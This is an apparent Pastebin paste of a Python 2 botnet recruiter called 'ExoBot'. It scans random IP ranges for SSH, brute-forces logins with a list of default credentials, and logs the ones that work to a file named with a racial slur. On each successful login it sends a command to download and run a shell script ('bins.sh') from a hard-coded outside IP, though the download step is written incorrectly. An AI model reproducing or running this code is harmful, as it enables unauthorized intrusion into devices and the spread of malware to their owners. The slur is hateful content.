Advertisement
Guest User

exo.py

a guest
Jan 18th, 2017
30
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.25 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. # python exoscanner.py 500 5.78 101 <~~ Slow but powerful
  4.  
  5. # python exoscanner.py 500 B 119.93 3 <~~ Fast but less effective
  6.  
  7. # Examples Below
  8.  
  9. # python exoscanner.py 500 LUCKY 1 1
  10.  
  11. # python exoscanner.py 500 LUCKY3 1 4
  12.  
  13. # python exoscanner.py 500 LUCKY2 1 3
  14.  
  15. # python exoscanner.py 500 B 49.144 3
  16.  
  17. # RANGES 113.53, 119.93, 122.3, 122.52, 101.109, 180.180, 125.27, 101.109
  18. import threading, paramiko, random, socket, time, sys
  19.  
  20. paramiko.util.log_to_file("/dev/null")
  21.  
  22. blacklist = [
  23. '127'
  24. ]
  25.  
  26. passwords = [
  27. "telnet:telnet"
  28. "admin:1234",
  29. "root:root",
  30. "ubnt:ubnt",
  31. "vagrant:vagrant",
  32. "pi:raspberry",
  33. "root:maxided"
  34. "root:123456",
  35. "root:Love2020",
  36. "root:Zero",
  37. "root:Password",
  38. "root:password",
  39. "root:qwerty",
  40. "root:dragon",
  41. "root:pussy",
  42. "root:baseball",
  43. "root:football",
  44. "root:monkey",
  45. "root:696969",
  46. "root:abc123"
  47. "admin:admin",
  48. "admin:1234",
  49. "admin:Guest",
  50. "ubnt:ubnt",
  51. "guest:guest",
  52. "user:user",
  53. "test:test",
  54.  
  55. ]
  56.  
  57. if sys.argv[4] == '1':
  58. passwords = ["root:root"] # Pretty gud lulz
  59. if sys.argv[4] == '2':
  60. passwords = ["guest:guest"] #Mehh
  61. if sys.argv[4] == '3':
  62. passwords = ["admin:1234"] #Guud
  63. if sys.argv[4] == '4':
  64. passwords = ["telnet:telnet"] #Asuum
  65. if sys.argv[4] == '5':
  66. passwords = ["root:root", "admin:1234"]
  67.  
  68. print "\x1b[0;32m _____ __ \x1b[0;32m"
  69. print "\x1b[0;32m / ' / ) \x1b[0;32m"
  70. print "\x1b[0;32m ---/__------|/----__--------\--------__----__----__----__----__---)__-\x1b[0;32m"
  71. print "\x1b[0;32m / | / ) \ / ' / ) / ) / ) /___) / )\x1b[0;32m"
  72. print "\x1b[0;32m _/____ ____/|__(___/_____(____/___(___ _(___(_/___/_/___/_(___ _/_____\x1b[0;32m"
  73. print "\x1b[0;32m / \x1b[0;32m"
  74. print "\x1b[0;32m Scanner started!\x1b[0;32m"
  75.  
  76. ipclassinfo = sys.argv[2]
  77. if ipclassinfo == "A":
  78. ip1 = sys.argv[3]
  79. elif ipclassinfo == "B":
  80. ip1 = sys.argv[3].split(".")[0]
  81. ip2 = sys.argv[3].split(".")[1]
  82. elif ipclassinfo == "C":
  83. ips = sys.argv[3].split(".")
  84. num=0
  85. for ip in ips:
  86. num=num+1
  87. if num == 1:
  88. ip1 = ip
  89. elif num == 2:
  90. ip2 = ip
  91. elif num == 3:
  92. ip3 = ip
  93. class sshscanner(threading.Thread):
  94. global passwords
  95. global ipclassinfo
  96. if ipclassinfo == "A":
  97. global ip1
  98. elif ipclassinfo == "B":
  99. global ip1
  100. global ip2
  101. elif ipclassinfo == "C":
  102. global ip1
  103. global ip2
  104. global ip3
  105. def run(self):
  106. while 1:
  107. try:
  108. while 1:
  109. thisipisbad='no'
  110. if ipclassinfo == "A":
  111. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  112. elif ipclassinfo == "B":
  113. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  114. elif ipclassinfo == "C":
  115. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  116. elif ipclassinfo == "LUCKY":
  117. lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78"]
  118. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  119. elif ipclassinfo == "LUCKY2":
  120. lucky2 = lucky2 = [ "122.3","210.213","59.69","122.52","122.54","119.93","124.105","125.104","119.92","119.91","49.144" ]
  121. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  122. elif ipclassinfo == "LUCKY3":
  123. lucky2 = [ "103.20","103.30","103.47","103.57","12.188","12.34" ]
  124. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  125.  
  126. for badip in blacklist:
  127. if badip in self.host:
  128. thisipisbad='yes'
  129. if thisipisbad=='no':
  130. break
  131. username='root'
  132. password=""
  133. port = 22
  134. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  135. s.settimeout(3)
  136. s.connect((self.host, port))
  137. s.close()
  138. ssh = paramiko.SSHClient()
  139. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  140. dobreak=False
  141. for passwd in passwords:
  142. if ":n/a" in passwd:
  143. password=""
  144. else:
  145. password=passwd.split(":")[1]
  146. if "n/a:" in passwd:
  147. username=""
  148. else:
  149. username=passwd.split(":")[0]
  150. try:
  151. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  152. dobreak=True
  153. break
  154. except:
  155. pass
  156. if True == dobreak:
  157. break
  158. badserver=True
  159. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  160. output = stdout.read()
  161. if "inet addr" in output:
  162. badserver=False
  163. if badserver == False:
  164. print '\x1b[0;32mExoBot joined da net! ' +self.host+'|'+username+'|'+password+'|'+str(port)
  165. ssh.exec_command("cd /tmp; http://46.166.185.34/bins.sh; chmod +x bins.sh; sh bins.sh")
  166. nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  167. time.sleep(15)
  168. ssh.close()
  169. except:
  170. pass
  171.  
  172. for x in range(0,1500):
  173. try:
  174. t = sshscanner()
  175. t.start()
  176. except:
  177. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement